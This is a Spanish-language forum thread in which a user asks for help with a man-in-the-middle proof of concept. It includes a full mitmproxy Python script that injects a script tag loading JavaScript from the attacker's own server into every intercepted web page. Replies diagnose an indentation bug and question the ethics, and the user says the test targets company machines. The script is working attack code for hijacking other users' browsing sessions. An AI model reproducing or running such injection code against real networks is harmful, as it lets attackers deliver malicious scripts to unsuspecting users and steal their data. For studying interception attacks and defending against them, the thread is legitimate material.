Foro de elhacker.net

Buenas,

estoy tratando de hacer una POC que me he encontrado, y no soy capaz de inyectar el código que quiero a ver si me podéis echar un cable.

Estoy usando

KALI 2
--------
mitmproxy

y un script que me he encontrado por ahí para inyectar código JS.

# Usage: mitmdump -s "js_injector.py src"
# (this script works best with --anticache)
from bs4 import BeautifulSoup
from libmproxy.protocol.http import decoded

# On start of proxy server ask for src as an argument
def start(context, argv):
    if len(argv) != 2:
        raise ValueError('Usage: -s "js_injector.py src"')
    context.src_url = argv[1]


def response(context, flow):
    if flow.request.host in context.src_url:
        return # Make sure JS isn't injected to itself
    with decoded(flow.response):  # Remove content encoding (gzip, ...)
        html = BeautifulSoup(flow.response.content)
        if html.body:
            script = html.new_tag(
                "script",
                src=context.src_url,
                type='application/javascript')
            html.body.insert(0, script)
            flow.response.content = str(html)
            context.log("Script injected.")

Hago la redirección de tráfico HTTP y HTTPS al 8080 de mitmproxy; y el problema viene cuando trato de hacer la inyección llamando al script de java que subo a mi
python -m SimpleHTTPServer 80

(http://i.imgur.com/ValRmEV.png?1)

alguna idea de este error?

es un problema de sangría... python es sensible con los espacios a la izquierda, distningue espacios de tabulaciones y la cantidad de los mismos

el foro no apoya a ilegales......o no éticos

paso de buscar citas......

como no me conoces de nada entiendo que tienes razones suficientes (por mi nick o no sé por qué) para decirme que realizo acciones ilegales/no éticos

no sé qué tiene de ilegal realizar POC's en los equipos de mi propia empresa, para poner tonterías mejor no escribas; o si lo haces no prejuzgues


muchas gracias ya está solucionado  ;-)